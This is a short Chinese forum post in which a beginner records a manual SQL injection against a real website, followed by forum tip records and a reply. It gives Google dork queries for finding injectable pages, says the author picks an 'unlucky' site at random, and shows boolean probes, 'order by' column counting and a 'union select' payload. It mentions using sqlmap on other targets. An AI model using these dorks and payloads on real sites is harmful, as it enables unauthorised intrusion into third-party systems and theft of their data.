萌新记录一次src某网站的显错注入

4319083   ·   发表于 2021-07-25 16:15:30   ·   实战纪实

前面挖了几次都是 and 1=1 and 1=2 报错的话就直接丢sqlmap跑 (其实是手动没做出来)

这次手动做,靶场的做法一样

通过谷歌语法找网站

地区+inurl:asp?id=50

地区+inurl:php?id=50

地区+inurl:”type_id=1

选中一个倒霉蛋开始

在id=2后面插入 and 1=1 and 1=2 发现报错



有注入,用显错注入

id=2 and 1=1 order by 13 一直到14不报错 那就是13 了



开始联合查询 id=1 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13

用户名金币积分时间理由
xiaozhu7719 3.00 0 2021-09-26 15:03:39 一个受益终生的帖子~~
xiaozhu7719 1.00 0 2021-09-26 15:03:19 一个受益终生的帖子~~

打赏我,让我更有动力~

1 Reply   |  Until 2021-9-26 | 1573 View

xiaozhu7719
发表于 2021-9-26

看你的居然看懂了哈哈

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.